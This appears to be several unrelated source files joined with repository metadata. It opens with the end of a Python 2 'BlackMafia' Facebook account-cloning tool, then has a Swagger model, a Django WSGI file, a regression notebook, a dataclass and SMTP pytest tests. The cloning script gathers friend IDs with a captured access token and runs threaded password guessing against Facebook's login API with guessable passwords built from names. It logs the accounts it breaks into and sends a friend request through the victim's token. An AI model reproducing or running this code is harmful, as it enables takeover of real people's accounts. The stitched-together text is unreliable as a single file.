os.system('xdg-open https://m.youtube.com/channel/UCRrRgcJjsnNm5Bi5ZenRGnw')
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='+z['access_token'])
menu()
except requests.exceptions.ConnectionError:
print"\n\x1b[1;91mThere is no internet connection"
keluar()
if 'checkpoint' in url:
print("\n\x1b[1;92mYour Account is on Checkpoint")
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print("\n\x1b[1;93mPassword/Email is wrong")
os.system('rm -rf login.txt')
time.sleep(1)
login()
def menu():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
os.system('clear')
print"\x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('clear')
print"\033[1;91mYour Account is on Checkpoint"
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print"\x1b[1;92mThere is no internet connection"
keluar()
os.system("clear") #Dev:love_hacker
print logo
print " \033[1;95m«-----♡----\033[1;93mLogged in User Info\033[1;95m----♡-----»"
print " \033[1;94m Name\033[1;93m:\033[1;92m"+nama+"\033[1;97m "
print " \033[1;97m ID\033[1;93m:\033[1;92m"+id+"\x1b[1;97m "
print "\033[1;95m♡──────────•◈•──────────♡\033[1;96mBlackMafia\033[1;95m♡──────────•◈•──────────♡"
print "\033[1;97m--\033[1;92m> \033[1;92m1.\x1b[1;92mStart Cloning..."
print "\033[1;97m--\033[1;91m> \033[1;91m0.\033[1;91mExit "
pilih()
def pilih():
unikers = raw_input("\n\033[1;91mChoose an Option>>> \033[1;97m")
if unikers =="":
print "\x1b[1;91mFill in correctly"
pilih()
elif unikers =="1":
super()
elif unikers =="0":
jalan('Token Removed')
os.system('rm -rf login.txt')
keluar()
else:
print "\x1b[1;91mFill in correctly"
pilih()
def super():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print "\033[1;96m--\033[1;92m> \033[1;92m1.\x1b[1;91mClone From Friend List..."
print "\033[1;96m--\033[1;92m> \033[1;92m2.\x1b[1;91mClone From Public ID..."
print "\033[1;96m--\033[1;91m> \033[1;91m0.\033[1;94mBack"
pilih_super()
def pilih_super():
peak = raw_input("\n\033[1;97mChoose an Option>>> \033[1;97m")
if peak =="":
print "\x1b[1;91mFill in correctly"
pilih_super()
elif peak =="1":
os.system('clear')
print logo
print "\033[1;95m♡──────────•◈•──────────♡\033[1;96mBlackMafia\033[1;95m♡──────────•◈•──────────♡"
jalan('\033[1;93mGetting IDs \033[1;97m...')
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif peak =="2":
os.system('clear')
print logo
idt = raw_input("\033[1;96m[♡] \033[1;92mEnter ID\033[1;93m: \033[1;97m")
print "\033[1;95m♡──────────•◈•──────────♡\033[1;96mBlackMafia\033[1;95m♡──────────•◈•──────────╯♡"
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;93mName\033[1;93m:\033[1;97m "+op["name"]
except KeyError:
print"\x1b[1;92mID Not Found!"
raw_input("\n\033[1;96m[\033[1;94mBack\033[1;96m]")
super()
print"\033[1;93mGetting IDs\033[1;93m..."
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif peak =="0":
menu()
else:
print "\x1b[1;91mFill in correctly"
pilih_super()
print "\033[1;91mTotal IDs\033[1;93m: \033[1;94m"+str(len(id))
jalan('\033[1;92mPlease Wait\033[1;93m...')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;91mCloning\033[1;93m"+o),;sys.stdout.flush();time.sleep(1)
print "\n\033[1;94m«-----\x1b[1;93m♡To Stop Process Press CTRL+Z♡\033[1;94m----»"
print "\033[1;95m♡──────────•◈•──────────♡\033[1;96mBlackMafia\033[1;95m♡──────────•◈•──────────♡"
jalan(' \033[1;93m ........Cloning Start plzzz Wait.......... ')
print "\033[1;95m♡──────────•◈•──────────♡\033[1;96mBlackMafia\033[1;95m♡──────────•◈•──────────♡"
def main(arg):
global cekpoint,oks
user = arg
try:
os.mkdir('out')
except OSError:
pass #Dev:love_hacker
try:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass1 = ('786786')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;92mSuccessful\x1b[1;97m-\x1b[1;92m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass1
oks.append(user+pass1)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;95mCheckpoint\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass1
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass1+"\n")
cek.close()
cekpoint.append(user+pass1)
else:
pass2 = 'Pakistan'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;92mSuccessful\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass2
oks.append(user+pass2)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;95mCheckpoint\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass2
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass2+"\n")
cek.close()
cekpoint.append(user+pass2)
else:
pass3 = a['first_name'] + 'rajpoot'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;92mSuccessful\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass3
oks.append(user+pass3)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;95mCheckpoint\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass3
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass3+"\n")
cek.close()
cekpoint.append(user+pass3)
else:
pass4 = b['first_name'] + 'mughal'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;92mSuccessful\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass4
oks.append(user+pass4)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;95mCheckpoint\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass4
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass4+"\n")
cek.close()
cekpoint.append(user+pass4)
else:
pass5 = b['first_name'] + 'malik'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;92mSuccessful\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass5
oks.append(user+pass5)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;95mCheckpoint\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass5
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass5+"\n")
cek.close()
cekpoint.append(user+pass5)
else:
pass6 = b['first_name'] + 'khan'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;92mSuccessful\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass6
oks.append(user+pass6)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;95mCheckpoint\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass6
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass6+"\n")
cek.close()
cekpoint.append(user+pass6)
else:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass7 = b['first_name'] + 'afridi'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;92mSuccessful\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass7
oks.append(user+pass7)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;95mCheckpoint\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass7
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass7+"\n")
cek.close()
cekpoint.append(user+pass7)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print "\033[1;95m♡──────────•◈•──────────♡\033[1;96mBlackMafia\033[1;95m♡──────────•◈•──────────♡"
print " \033[1;93m«---•◈•---Developed By love---•◈•---»" #Dev:love_hacker
print '\033[1;91mProcess Has Been Completed\033[1;92m....'
print"\033[1;91mTotal OK/\x1b[1;93mCP \033[1;91m: \033[1;91m"+str(len(oks))+"\033[1;97m/\033[1;95m"+str(len(cekpoint))
print """
...........███ ]▄▄▄▄▄▃
..▂▄▅█████▅▄▃▂
[███████████████]
◥⊙▲⊙▲⊙▲⊙▲⊙▲⊙◤
♡──────────────•◈•──────────────♡.
: \033[1;96m .....lovehacker BlackMafia........... \033[1;93m :
♡──────────────•◈•──────────────♡.'
whatsapp Num
+8801755974285"""
raw_input("\n\033[1;92m[\033[1;94mBack\033[1;96m]")
menu()
if __name__ == '__main__':
login()
|
[
"noreply@github.com"
] |
Sohagblacktiger786.noreply@github.com
|
f8326902b0bbeae2dd43d1248ab798f698020f55
|
ec4f4aa5e22131bb094e6afc5af35dd37d68d3df
|
/python-flask/swagger_server/models/vlan_logical_single_tagged_list_config.py
|
b8a234094d459c364f2dc98d5894c6f5cb2a4629
|
[] |
no_license
|
ajragusa/OpenConfigAPI
|
e4224212dac3fb125ebff2ebedda930c9c979e71
|
485da3b2b96d568f857ccc931a86d7e7e9f3cab4
|
refs/heads/master
| 2020-05-29T23:01:05.287841
| 2019-05-30T17:16:39
| 2019-05-30T17:16:39
| 189,425,372
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,848
|
py
|
# coding: utf-8
from __future__ import absolute_import
from datetime import date, datetime # noqa: F401
from typing import List, Dict # noqa: F401
from swagger_server.models.base_model_ import Model
from swagger_server import util
class VlanLogicalSingleTaggedListConfig(Model):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, vlan_ids: List[str]=None): # noqa: E501
"""VlanLogicalSingleTaggedListConfig - a model defined in Swagger
:param vlan_ids: The vlan_ids of this VlanLogicalSingleTaggedListConfig. # noqa: E501
:type vlan_ids: List[str]
"""
self.swagger_types = {
'vlan_ids': List[str]
}
self.attribute_map = {
'vlan_ids': 'vlanIds'
}
self._vlan_ids = vlan_ids
@classmethod
def from_dict(cls, dikt) -> 'VlanLogicalSingleTaggedListConfig':
"""Returns the dict as a model
:param dikt: A dict.
:type: dict
:return: The VlanLogicalSingleTaggedListConfig of this VlanLogicalSingleTaggedListConfig. # noqa: E501
:rtype: VlanLogicalSingleTaggedListConfig
"""
return util.deserialize_model(dikt, cls)
@property
def vlan_ids(self) -> List[str]:
"""Gets the vlan_ids of this VlanLogicalSingleTaggedListConfig.
:return: The vlan_ids of this VlanLogicalSingleTaggedListConfig.
:rtype: List[str]
"""
return self._vlan_ids
@vlan_ids.setter
def vlan_ids(self, vlan_ids: List[str]):
"""Sets the vlan_ids of this VlanLogicalSingleTaggedListConfig.
:param vlan_ids: The vlan_ids of this VlanLogicalSingleTaggedListConfig.
:type vlan_ids: List[str]
"""
self._vlan_ids = vlan_ids
|
[
"aragusa@globalnoc.iu.edu"
] |
aragusa@globalnoc.iu.edu
|
c7f78e163aed581952e2e9b721d54ff257144534
|
af09ba1ce23b21e8d7d95c76d9d49cd504c0baf8
|
/craigslist_clone/wsgi.py
|
7ee2f651bad3d4a336cffcb6b281244459bc03be
|
[] |
no_license
|
euhidaman/craigslist_clone
|
3ceae7a3973098521c489ff8252c881aae5bd602
|
846f290552805bdcc339f2841df940c7e3030acc
|
refs/heads/master
| 2022-12-25T00:59:12.864881
| 2020-10-04T04:19:27
| 2020-10-04T04:19:27
| 299,649,497
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 409
|
py
|
"""
WSGI config for craigslist_clone project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'craigslist_clone.settings')
application = get_wsgi_application()
|
[
"aman.derax20@gmail.com"
] |
aman.derax20@gmail.com
|
52ed57756ebb7464f0ac9571c0f8add9e005d1bf
|
659db74e51e2480b3ef99387eb63f854db0b78c7
|
/api/migrations/0004_appointment.py
|
5fb0f1c8c729abc58005bd1df989b49d2aa9e179
|
[] |
no_license
|
randyjap/Python-Backend
|
7552dfed0ed6d72807b631a5aec35e86c90590e2
|
2817023e5881ee883f1e28d6882f9b0dc21ddc44
|
refs/heads/master
| 2021-01-22T05:46:54.582451
| 2017-02-20T03:49:46
| 2017-02-20T03:49:46
| 81,701,457
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 864
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-02-15 23:35
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('api', '0003_auto_20170215_2332'),
]
operations = [
migrations.CreateModel(
name='Appointment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('time', models.DateTimeField()),
('doctor', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='api.Doctor')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
|
[
"randyjap@gmail.com"
] |
randyjap@gmail.com
|
18eaef8d089f9eaf3b0efe9ef758dfcbfa9a9590
|
26579f272bedbd5093b709618b4fe9d0b15fdfcc
|
/app/dc/player.py
|
4140479edd2787f8ff29aef258a1f2d4cc9d0219
|
[] |
no_license
|
david-wm-sanders/varvaytya-py
|
129f279a5178d7b2507413c23f228a6bab645440
|
88e36985ffaaaf1176a4e542badd2595cd0b1a99
|
refs/heads/master
| 2023-08-26T00:14:17.477922
| 2021-11-10T05:43:01
| 2021-11-10T05:43:01
| 410,693,797
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,138
|
py
|
import dataclasses
import xml.etree.ElementTree as XmlET
from .exc import XmlLoadKeyError, XmlLoadValueError
from .person import PersonDc
from .profile import ProfileDc
@dataclasses.dataclass
class PlayerDc:
hash_: int
rid: str
person: PersonDc
profile: ProfileDc
@classmethod
def from_element(cls, element: XmlET.Element):
x = element.attrib
try:
hash_ = int(x.get("hash"))
rid = x.get("rid")
# todo: more validation
except KeyError as e:
print(f"Player attribute key error: {e}")
raise XmlLoadKeyError() from e
except ValueError as e:
print(f"Player attribute value error: {e}")
raise XmlLoadValueError() from e
except Exception as e:
print(f"Player attribute load failed: {e}")
raise
person_elem = element.find("person")
person = PersonDc.from_element(person_elem)
profile_elem = element.find("profile")
profile = ProfileDc.from_element(profile_elem)
return cls(hash_=hash_, rid=rid, person=person, profile=profile)
|
[
"david.wm.sanders@gmail.com"
] |
david.wm.sanders@gmail.com
|
12fc0ee1166b4df4407683936d693911b1337cb8
|
df519fcb24870f66c57ac758237eb65e1cc41243
|
/Initial testing - TB1/OB - 011220 UK Household Data Manipulation - Linear Regression Using Scikit learn.py.html
|
818cb73e5508b38ff5a0c9e2e5410ecfb303e4a9
|
[] |
no_license
|
EMAT31530/green-team-repo-2
|
dfb7f12426fb5ea96caef0e4b9d02786edef7986
|
cf41da2e2f4567cd58b7f160a2ac626a6ab97541
|
refs/heads/main
| 2023-08-07T15:53:31.673435
| 2021-04-15T14:15:30
| 2021-04-15T14:15:30
| 342,831,903
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,843
|
html
|
#!/usr/bin/env python
# coding: utf-8
# In[28]:
#create datafram to pull out data as required
import pandas as pd
import numpy as np
Household_Spend = pd.read_csv('UK_Household_Quantity2.csv', header=None)
Household_Spend
# In[29]:
#Pull required data
Milk = Household_Spend.iloc[1,6:51].values
# In[30]:
Milk = np.reshape(Milk, (45, 1))
Milk = Milk.astype(np.int32)
Milk
# In[31]:
#Pull yearly data
Year = Household_Spend.iloc[0,6:51].values
Year = np.reshape(Year, (45, 1))
Year = Year.astype(np.int32)
Year
# In[32]:
get_ipython().run_line_magic('matplotlib', 'inline')
import matplotlib.pyplot as plt
# for a scatter plot...
plt.scatter(Year, Milk)
plt.xlabel('Year')
plt.ylabel('Weekly Milk Demand (ml)')
plt.show()
# In[33]:
import numpy as np
Year = np.hstack((np.ones(shape=(len(Year), 1)), Year))
Year
# In[34]:
Year.T
# $$(\mathbf{X}^T\mathbf{X})^{-1} \mathbf{X}^T\mathbf{y}$$
# In[35]:
# ls - is the least sqares estimat
ls = np.linalg.inv(Year.T.dot(Year)).dot(Year.T).dot(Milk)
ls
# In[36]:
# = features dotproduct with least squares
Milk_hat = Year.dot(ls)
Milk_hat
# In[37]:
# mean sqaured error - for numpy we need to flatten our array
mse = np.mean((Milk.flatten() - Milk_hat) **2)
mse
# In[38]:
plt.plot(Year[:,1], Milk_hat, c='g', label='Model') # as we are using yhat these are our predictions - green line of model
plt.scatter(Year[:,1], Milk, c='b', label='Data') # this is our actual data
plt.legend(loc='best')
plt.xlabel('Year')
plt.ylabel('Milk Demand (ml)')
plt.show()
# In[25]:
# Now we predict milk demand based on year
#new_Year = np.array([[1, 2025], [1, 2030]])
#new_Milk_hat = new_Year.dot(ls)
#new_Milk_hat
# In[26]:
# this is commented out as it will cause the two new data points to be added and so will not allows us to do linear regression in Scikit Learn
#plt.scatter(Year[:,1], Milk, c='b', label='Data')
#Year = np.concatenate((Year, new_Year)) # adding the new points to the old data so that we have one array.
#Milk_hat = np.concatenate((Milk_hat, new_Milk_hat)) #same as line above
#plt.plot(Year[:,1], Milk_hat, c='g', label='Model')
#plt.scatter(new_Year[:,1], new_Milk_hat, c='r')
#plt.legend(loc='best')
#plt.xlabel('Year')
#plt.ylabel('Milk Demand (ml)')
#plt.show()
# In[39]:
# this is how we normally implement linear regression
from sklearn.linear_model import LinearRegression
regr = LinearRegression().fit(Year[:,1].reshape(-1, 1), Milk) # fit and predict
# In[40]:
Milk_hat = regr.predict(Year[:,1].reshape(-1, 1)) # predictions made by sklearn rather than the linear regression
# In[41]:
plt.scatter(Year[:,1], Milk, c='b', label='Data')
plt.plot(Year[:,1], Milk_hat, c='g', label='Model')
plt.legend(loc='best')
plt.xlabel('Square Meters')
plt.ylabel('Price (k)')
plt.show()
# In[ ]:
# In[ ]:
|
[
"73698372+HannahSpurgeon@users.noreply.github.com"
] |
73698372+HannahSpurgeon@users.noreply.github.com
|
52e13ff11f44e8a73d5997977c6a8554d65d0732
|
6b6aae84763c7ad7ad4585d8410007e383ed41fb
|
/test/test.py
|
257e4ee05227908376ffc5a24a656c3a18b6828f
|
[] |
no_license
|
PowerMeMobile/email2sms
|
b3f9781c83f0081c809db4509bca1665a4c72529
|
f4b67b49326b576d53c160393b334559509f72c6
|
refs/heads/master
| 2020-05-26T07:47:26.383983
| 2015-12-08T12:34:25
| 2015-12-08T12:34:25
| 25,347,909
| 0
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,839
|
py
|
# -*- coding: utf-8 -*-
import pytest
import os
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
EMAIL_HOST = os.getenv('EMAIL_HOST')
if EMAIL_HOST == None or EMAIL_HOST == '':
EMAIL_HOST = '127.0.0.1'
EMAIL_PORT = os.getenv('EMAIL_PORT')
if EMAIL_PORT == None or EMAIL_PORT == '':
EMAIL_PORT = '2525'
AUTH_FROM_ADDR = 'email-postpaid@mail.com'
AUTH_FROM_ADDR_BAD = 'd.klionsky@dev1team.net'
AUTH_FROM_ADDR_USER_NO_EMAIL_IF = 'email_no_email_if-postpaid@mail.com'
AUTH_SUBJECT = '10009:user:password'
AUTH_SUBJECT_BAD = 'bad auth subject'
AUTH_SUBJECT_BAD_PASSWORD = '10009:user:bad_password'
AUTH_TO_ADDR = '375296660009@mail.com'
AUTH_TO_ADDR_NOT_ALLOWED = '375296660019@mail.com'
AUTH_TO_ADDR_BAD = 'bad_number@mail.com'
TO = '375296543210@mail.com'
TO2 = ['375296543210@mail.com', '375296543211@mail.com']
TO3 = ['375296543210@mail.com', '375296543211@mail.com', '375296543212@mail.com']
TO4 = ['375296543210@mail.com', '375296543211@mail.com', '375296543212@mail.com', '375296543212@mail.com']
TO2_BAD_DOMAINS = ['375296543210@mail2.com', '375296543211@mail2.com']
TO2_BAD_COVERAGE = ['888296543210@mail.com', '888296543211@mail.com']
@pytest.fixture
def smtp():
smtp = smtplib.SMTP(EMAIL_HOST, EMAIL_PORT)
resp, _msg = smtp.ehlo()
assert resp == 250
return smtp
#
# Utils
#
def sendmail(smtp, f, t, msg):
try:
return smtp.sendmail(f, t, msg)
except smtplib.SMTPDataError as (code, resp):
return (code, resp)
#
# Auth schemes
#
def test_auth_from_address_succ(smtp):
msg = MIMEText('from_address test')
msg['From'] = AUTH_FROM_ADDR
msg['To'] = TO
res = sendmail(smtp, msg['From'], TO, msg.as_string())
assert {} == res
def test_auth_from_address_fail(smtp):
msg = MIMEText('from_address test')
msg['From'] = AUTH_FROM_ADDR_BAD
msg['To'] = TO
(code, resp) = sendmail(smtp, msg['From'], TO, msg.as_string())
assert code == 550
assert resp == 'Invalid user account'
def test_auth_from_address_user_no_email_if_fail(smtp):
msg = MIMEText('from_address test')
msg['From'] = AUTH_FROM_ADDR_USER_NO_EMAIL_IF
## both subject and to_address auth are valid.
## the test should fail nonetheless because customer is found,
## but doesn't have email interface
msg['To'] = AUTH_TO_ADDR
msg['Subject'] = AUTH_SUBJECT
(code, resp) = sendmail(smtp, msg['From'], TO, msg.as_string())
assert code == 550
assert resp == 'Invalid user account'
def test_auth_subject_succ(smtp):
msg = MIMEText('subject test')
msg['From'] = AUTH_FROM_ADDR_BAD
msg['To'] = TO
msg['Subject'] = AUTH_SUBJECT
res = sendmail(smtp, msg['From'], TO, msg.as_string())
assert {} == res
def test_auth_subject_bad_subject_fail(smtp):
msg = MIMEText('subject test')
msg['From'] = AUTH_FROM_ADDR_BAD
msg['To'] = TO
msg['Subject'] = AUTH_SUBJECT_BAD
(code, resp) = sendmail(smtp, msg['From'], TO, msg.as_string())
assert code == 550
assert resp == 'Invalid user account'
def test_auth_subject_bad_password_fail(smtp):
## to_address auth is valid.
## the test should fail nonetheless because customer is found,
## but the password is wrong
msg = MIMEText('subject test')
msg['From'] = AUTH_FROM_ADDR_BAD
msg['To'] = AUTH_TO_ADDR
msg['Subject'] = AUTH_SUBJECT_BAD_PASSWORD
(code, resp) = sendmail(smtp, msg['From'], TO, msg.as_string())
assert code == 550
assert resp == 'Invalid user account'
def test_auth_to_address_succ(smtp):
msg = MIMEText('to_address test')
msg['From'] = AUTH_FROM_ADDR_BAD
msg['To'] = AUTH_TO_ADDR
res = sendmail(smtp, msg['From'], AUTH_TO_ADDR, msg.as_string())
assert {} == res
def test_auth_to_address_fail(smtp):
msg = MIMEText('to_address test')
msg['From'] = AUTH_FROM_ADDR_BAD
msg['To'] = AUTH_TO_ADDR_BAD
(code, resp) = sendmail(smtp, msg['From'], AUTH_TO_ADDR_BAD, msg.as_string())
assert code == 550
assert resp == 'Invalid user account'
def test_auth_to_address_no_allowed_fail(smtp):
msg = MIMEText('to_address test')
msg['From'] = AUTH_FROM_ADDR_BAD
msg['To'] = AUTH_TO_ADDR_NOT_ALLOWED
(code, resp) = sendmail(smtp, msg['From'], AUTH_TO_ADDR_NOT_ALLOWED, msg.as_string())
assert code == 550
assert resp == 'Invalid user account'
#
# MIME content types
#
# raw text
def test_raw_text_us_ascii_succ(smtp):
msg = """\
From: %s
To: %s
Subject: %s
%s
""" % (AUTH_FROM_ADDR_BAD, TO, AUTH_SUBJECT, 'raw text us-ascii')
res = sendmail(smtp, AUTH_FROM_ADDR_BAD, TO, msg)
assert {} == res
def test_text_plain_us_ascii_succ(smtp):
msg = MIMEText('text plain us-ascii')
msg['From'] = AUTH_FROM_ADDR_BAD
msg['To'] = TO
msg['Subject'] = AUTH_SUBJECT
res = sendmail(smtp, msg['From'], TO, msg.as_string())
assert {} == res
def test_text_plain_utf_8_succ(smtp):
msg = MIMEText('Привет, как дела?', _charset='utf-8')
msg['From'] = AUTH_FROM_ADDR_BAD
msg['To'] = TO
msg['Subject'] = AUTH_SUBJECT
res = sendmail(smtp, msg['From'], TO, msg.as_string())
assert {} == res
def test_text_html_succ(smtp):
html = """\
<html>
<head></head>
<body>
<p>text %2F html</p>
</body>
</html>
"""
msg = MIMEText(html, 'html')
msg['From'] = AUTH_FROM_ADDR_BAD
msg['To'] = TO
msg['Subject'] = AUTH_SUBJECT
res = sendmail(smtp, msg['From'], TO, msg.as_string())
assert {} == res
def test_multipart_alternative_succ(smtp):
msg = MIMEMultipart('multipart alternative')
msg['From'] = AUTH_FROM_ADDR_BAD
msg['To'] = TO
msg['Subject'] = AUTH_SUBJECT
text = "text/alternative text"
html = """\
<html>
<head></head>
<body>
<p>text/alternative html</p>
</body>
</html>
"""
part1 = MIMEText(text, 'plain')
part2 = MIMEText(html, 'html')
msg.attach(part1)
msg.attach(part2)
res = sendmail(smtp, msg['From'], TO, msg.as_string())
assert {} == res
def test_multipart_mixed_succ(smtp):
msg = MIMEMultipart()
msg['From'] = AUTH_FROM_ADDR_BAD
msg['To'] = TO
msg['Subject'] = AUTH_SUBJECT
msg.attach(MIMEText('multipart mixed'))
res = sendmail(smtp, msg['From'], TO, msg.as_string())
assert {} == res
#
# Filter by domains
#
def test_filter_by_domains_2_ok_succ(smtp):
msg = MIMEText('filter by domain test')
msg['From'] = AUTH_FROM_ADDR_BAD
msg['To'] = ','.join(TO2)
msg['Subject'] = AUTH_SUBJECT
res = sendmail(smtp, msg['From'], TO2, msg.as_string())
assert {} == res
def test_filter_by_domains_2_bad_fail(smtp):
msg = MIMEText('filter by domain test')
msg['From'] = AUTH_FROM_ADDR_BAD
msg['To'] = ','.join(TO2_BAD_DOMAINS)
msg['Subject'] = AUTH_SUBJECT
(code, resp) = sendmail(smtp, msg['From'], TO2_BAD_DOMAINS, msg.as_string())
assert code == 550
assert resp == 'No valid recipients found'
# assumes invalid_recipient_policy == reject_message
def test_filter_by_domains_2_ok_2_bad_fail(smtp):
msg = MIMEText('filter by domain test')
msg['From'] = AUTH_FROM_ADDR_BAD
msg['To'] = ','.join(TO2 + TO2_BAD_DOMAINS)
msg['Subject'] = AUTH_SUBJECT
(code, resp) = sendmail(smtp, msg['From'], TO2 + TO2_BAD_DOMAINS, msg.as_string())
assert code == 550
assert resp == 'Rejected by invalid recipient policy'
#
# Filter by coverage
#
def test_filter_by_coverage_3_ok_succ(smtp):
msg = MIMEText('filter by coverage test')
msg['From'] = AUTH_FROM_ADDR_BAD
msg['To'] = ','.join(TO3)
msg['Subject'] = AUTH_SUBJECT
